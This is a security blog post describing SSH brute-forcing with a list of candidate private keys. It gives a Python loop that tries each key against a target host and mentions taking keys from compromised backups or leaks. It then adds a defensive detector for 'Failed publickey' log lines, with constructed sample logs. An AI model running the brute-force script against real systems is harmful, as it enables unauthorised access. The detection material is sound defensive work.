Blog | G5 Cyber Security

SSH Brute Force with Key Pairs

TL;DR

Brute-forcing SSH accounts with key pairs is generally ineffective and slow because of how public/private key cryptography works. It is only possible at all if you already hold a list of candidate private keys. This guide outlines how such an attempt is made (for legitimate penetration testing purposes only) and highlights why it’s usually impractical.

How SSH Key Authentication Works

SSH key authentication relies on cryptographic proof. The server doesn’t ‘guess’ the key; it verifies that you possess the correct private key corresponding to a public key already authorized on the system. This makes traditional brute-forcing (trying many passwords) inapplicable.

Attempting Key Pair Brute Force

  1. Gather Potential Private Keys: This is the hardest part. You need a list of private keys that might be used to access the server. These could come from compromised backups, leaked data, or previous employee accounts. Without this list, brute-forcing is impossible.
  2. Prepare a Key List File: Create a text file (e.g., keys.txt) with one private key per line. Each line should contain the full path to the private key file.
    /home/user/.ssh/id_rsa
    /root/.ssh/another_key
    /opt/backup/.ssh/old_key
    
  3. Use a Brute-Force Tool: Several tools can attempt to connect using the keys in your list. ssh-keyscan and custom scripts are common options.

    Using ssh-keyscan (for authorized_keys): This isn’t direct brute-forcing, but it helps identify whether any of your potential public keys *are already* on the server. It won’t test private key validity.

    ssh-keyscan target_host > known_hosts
    
  4. Custom Script (Example – Python): A more effective approach involves writing a script to iterate through the keys and attempt connections.
    import subprocess
    
    # keys.txt holds one private-key path per line (see step 2).
    with open('keys.txt', 'r') as f:
        for key in f:
            key = key.strip()
            if not key:
                continue  # skip blank lines
            try:
                # BatchMode=yes stops ssh from falling back to a password prompt when the
                # key is rejected; IdentitiesOnly=yes stops it from also offering keys held
                # by ssh-agent (which would make the wrong key look successful); the trailing
                # 'true' runs a no-op instead of opening an interactive shell.
                subprocess.run(['ssh', '-i', key, '-o', 'BatchMode=yes',
                                '-o', 'IdentitiesOnly=yes', '-o', 'ConnectTimeout=10',
                                'user@target_host', 'true'],
                               check=True, capture_output=True)
                print(f'Success with key: {key}')
                break  # Stop on first successful connection
            except subprocess.CalledProcessError as e:
                print(f'Failed with key: {key} - ssh exit status {e.returncode}')
    

    Important: Replace user@target_host with the actual username and hostname.

  5. Run the Script: Execute your Python script (or equivalent) to start the brute-force attempt.
    python brute_ssh.py
    
  6. Monitor Results: The script will output success or failure messages for each key it tries.
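Seen from the server side, the loop above leaves a trail of rejected keys in the sshd log. The following is an added example (not from the original post) that parses OpenSSH's "Failed publickey" lines and flags any source address that offered several different keys against one account across connections. The log lines, host name, addresses and fingerprints are constructed placeholders, not data from a real system.

```python
import re
from collections import defaultdict

# Matches OpenSSH's failed public-key line behind the usual syslog prefix
# ("Mon dd hh:mm:ss host sshd[pid]: ..."). With the default LogLevel INFO,
# sshd only records a rejected key once a connection has used half of its
# MaxAuthTries or the user is invalid; LogLevel VERBOSE records every key offered.
FAILED_PUBKEY = re.compile(
    r'sshd\[\d+\]: Failed publickey for (?:invalid user )?(?P<user>\S+) '
    r'from (?P<ip>\S+) port (?P<port>\d+) ssh2: (?P<ktype>\S+) (?P<fp>SHA256:\S+)'
)

def failed_pubkeys(lines):
    """Return one (user, ip, port, fingerprint) tuple per rejected key."""
    hits = []
    for line in lines:
        m = FAILED_PUBKEY.search(line)
        if m:
            hits.append((m['user'], m['ip'], m['port'], m['fp']))
    return hits

def key_spraying_sources(lines, threshold=3):
    """Map (ip, user) -> sorted distinct fingerprints for sources that offered at
    least `threshold` different keys for one account. Counting distinct
    fingerprints (not attempts) keeps a legitimate client that retries the same
    key from being flagged; the threshold should exceed the number of keys a
    normal user carries in ssh-agent, since ssh offers each of those once."""
    keys = defaultdict(set)
    for user, ip, _port, fp in failed_pubkeys(lines):
        keys[(ip, user)].add(fp)
    return {src: sorted(fps) for src, fps in keys.items() if len(fps) >= threshold}

# Constructed sample log: one address works through a key list against 'deploy'
# over several short connections, while 'alice' has one agent key rejected
# before her real key is accepted.
SAMPLE_LOG = """\
Mar  3 10:00:01 bastion sshd[2101]: Failed publickey for deploy from 203.0.113.7 port 40110 ssh2: RSA SHA256:aaaa1111
Mar  3 10:00:01 bastion sshd[2101]: Failed publickey for deploy from 203.0.113.7 port 40110 ssh2: RSA SHA256:bbbb2222
Mar  3 10:00:02 bastion sshd[2101]: Connection closed by authenticating user deploy 203.0.113.7 port 40110 [preauth]
Mar  3 10:00:03 bastion sshd[2102]: Failed publickey for deploy from 203.0.113.7 port 40112 ssh2: ED25519 SHA256:cccc3333
Mar  3 10:00:05 bastion sshd[2103]: Failed publickey for deploy from 203.0.113.7 port 40114 ssh2: RSA SHA256:dddd4444
Mar  3 10:00:09 bastion sshd[2104]: Failed publickey for alice from 198.51.100.4 port 51000 ssh2: RSA SHA256:eeee5555
Mar  3 10:00:09 bastion sshd[2104]: Accepted publickey for alice from 198.51.100.4 port 51000 ssh2: ED25519 SHA256:ffff6666
Mar  3 10:00:12 bastion sshd[2105]: Failed publickey for invalid user admin from 203.0.113.7 port 40116 ssh2: RSA SHA256:aaaa1111
"""

if __name__ == '__main__':
    for (ip, user), fps in key_spraying_sources(SAMPLE_LOG.splitlines()).items():
        print(f'{ip} offered {len(fps)} different keys for {user}: {", ".join(fps)}')
```

Because MaxAuthTries (default 6) caps attempts per connection, a key-list run shows up as many short connections from one address, which is why the counter aggregates across connections rather than per sshd process. Pairing this with PerSourceMaxStartups or a fail2ban-style ban on the flagged address closes the loop.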

Why This is Usually Impractical

Ethical Considerations

Attempting to gain unauthorized access to any system is illegal and unethical. This guide is for educational purposes only and should only be used with explicit permission from the system owner as part of a legitimate penetration testing exercise.
